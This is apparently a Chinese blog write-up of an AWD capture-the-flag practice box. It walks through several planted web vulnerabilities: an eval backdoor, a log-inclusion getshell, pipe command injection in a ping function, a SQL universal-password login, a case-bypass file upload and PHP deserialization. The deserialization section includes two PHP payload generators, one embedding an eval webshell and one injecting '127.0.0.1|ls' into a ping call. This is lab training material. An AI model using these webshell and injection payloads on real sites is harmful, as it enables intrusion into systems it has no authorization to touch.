AWD-Test2

00x1-eval后门

先用D盾扫一波
在这里插入图片描述
在这里插入图片描述

00x2-日志包含

原理:
`log1.php``会把我们的请求以及其他的一些信息写进根目录下的log.php中。
然后我们进入log.php时,就会解析我们的shell了。
也就是有POST或者GET传参的地方,就能getshell
在这里插入图片描述

在这里插入图片描述
在任意位置添加一句话马,然后在/log.php,getshell
在这里插入图片描述
或者…
在这里插入图片描述

00x3-ping

在user.php中的ping,可以用管道来getflag
在这里插入图片描述
在这里插入图片描述
漏洞引发顺序:
index.php中的$c值在function.php中代表了文件名
在这里插入图片描述
function.php
在这里插入图片描述
然后index.php中的run_a($obj,$a);在function.php运行了在$obj中的方法,$a代表方法名
最后由user类中的ping方法引起了漏洞
在这里插入图片描述

00x4-万能密码

在登录页面万能密码
在这里插入图片描述
sql语句为(在user.login中)
在这里插入图片描述

00x5-文件上传

没有过滤大小写,可以传一个含一句话马的shell,例如a.phP
在这里插入图片描述

00x6-反序列化

第一处:cacf.php可以直接把马写入log.php

<?php
class chybeta{
    var $test;
}
$class4 = new chybeta();
$class4->test = '<?php @eval($_POST[1]);?>';
$class4_ser = serialize($class4);
echo $class4_ser;
?>

第二处home.php
原理:method是方法,args是参数
在这里插入图片描述

<?php

class home{
    
    private $method;
    private $args;
    function __construct($method, $args) {
        
      
        $this->method = $method;
        $this->args = $args;
    }   
}
$a=new home("ping",array("127.0.0.1|ls"));
echo base64_encode(serialize($a));
?>
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值